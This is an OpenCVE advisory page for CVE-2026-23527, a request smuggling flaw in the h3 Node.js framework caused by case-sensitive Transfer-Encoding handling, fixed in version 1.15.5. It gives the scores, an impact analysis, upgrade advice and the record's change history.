Description
H3 is a minimal H(TTP) framework built for high performance and portability. Prior to 1.15.5, there is a critical HTTP Request Smuggling vulnerability. readRawBody is doing a strict case-sensitive check for the Transfer-Encoding header. It explicitly looks for "chunked", but per the RFC, this header should be case-insensitive. This vulnerability is fixed in 1.15.5.
Published: 2026-01-15
Score: 8.9 High
EPSS: < 1% Very Low
KEV: No
Impact: HTTP Request Smuggling via case-sensitive Transfer-Encoding header handling
Action: Apply Latest Patch
AI Analysis

Impact

The vulnerability arises because the framework’s body parsing logic verifies the Transfer-Encoding header strictly for the value "chunked" with case sensitivity, whereas the HTTP specification dictates header names and values are case-insensitive. An attacker can send a header with differing capitalization to trick the parser into processing a second, smuggled request that the application ignores or treats differently, potentially allowing injection or bypass of application logic. This flaw is categorized as a critical request smuggling flaw that can undermine request integrity and confidentiality.

Affected Systems

The affected product is the h3 framework from h3js, intended for Node.js environments. All releases earlier than version 1.15.5 are impacted; the issue was rectified in that release.

Risk and Exploitability

The CVSS score of 8.9 indicates a high severity, yet the EPSS score is below 1% suggesting a low likelihood of active exploitation at present. It is not listed in the CISA Known Exploited Vulnerabilities catalog, which further reduces the immediate threat. Attackers would need network access to the vulnerable server and the ability to craft HTTP requests with custom Transfer-Encoding header values. If they succeed, the attack can lead to hidden data delivery, session hijacking, or denial of service.

Generated by OpenCVE AI on April 15, 2026 at 15:51 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the h3 dependency to version 1.15.5 or later, which incorporates the case-insensitive Transfer-Encoding handling fix.
  • If upgrading is not immediately possible, modify the readRawBody function to accept any capitalization of the Transfer-Encoding header value before processing.
  • After applying the change, run request-smuggling test cases and monitor server logs for anomalous Transfer-Encoding headers to confirm the vulnerability is resolved.

Generated by OpenCVE AI on April 15, 2026 at 15:51 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-mp2g-9vg9-f4cg h3 v1 has Request Smuggling (TE.TE) issue
History

Mon, 13 Apr 2026 17:15:00 +0000

Type Values Removed Values Added
Title Request Smuggling (TE.TE) in h3 v1 h3 v1 has Request Smuggling (TE.TE) issue
References

Fri, 23 Jan 2026 19:00:00 +0000

Type Values Removed Values Added
First Time appeared H3
H3 h3
CPEs cpe:2.3:a:h3:h3:*:*:*:*:*:node.js:*:*
Vendors & Products H3
H3 h3

Fri, 16 Jan 2026 14:15:00 +0000

Type Values Removed Values Added
First Time appeared H3js
H3js h3
Vendors & Products H3js
H3js h3

Fri, 16 Jan 2026 12:15:00 +0000

Type Values Removed Values Added
References
Metrics threat_severity

None

 threat_severity

Important

Thu, 15 Jan 2026 20:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Thu, 15 Jan 2026 19:45:00 +0000

Type Values Removed Values Added
Description H3 is a minimal H(TTP) framework built for high performance and portability. Prior to 1.15.5, there is a critical HTTP Request Smuggling vulnerability. readRawBody is doing a strict case-sensitive check for the Transfer-Encoding header. It explicitly looks for "chunked", but per the RFC, this header should be case-insensitive. This vulnerability is fixed in 1.15.5.
Title Request Smuggling (TE.TE) in h3 v1
Weaknesses CWE-444
References
Metrics cvssV3_1

{'score': 8.9, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L'}
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-13T16:48:19.873Z

Reserved: 2026-01-13T18:22:43.981Z

Link: CVE-2026-23527

cve-icon Vulnrichment

Updated: 2026-01-15T19:59:59.151Z

cve-icon NVD

Status : Modified

Published: 2026-01-15T20:16:05.620

Modified: 2026-04-13T17:16:27.900

Link: CVE-2026-23527

cve-icon Redhat

Severity : Important

Publid Date: 2026-01-15T19:24:20Z

Links: CVE-2026-23527 - Bugzilla

cve-icon OpenCVE Enrichment

Updated: 2026-04-15T18:15:10Z

Weaknesses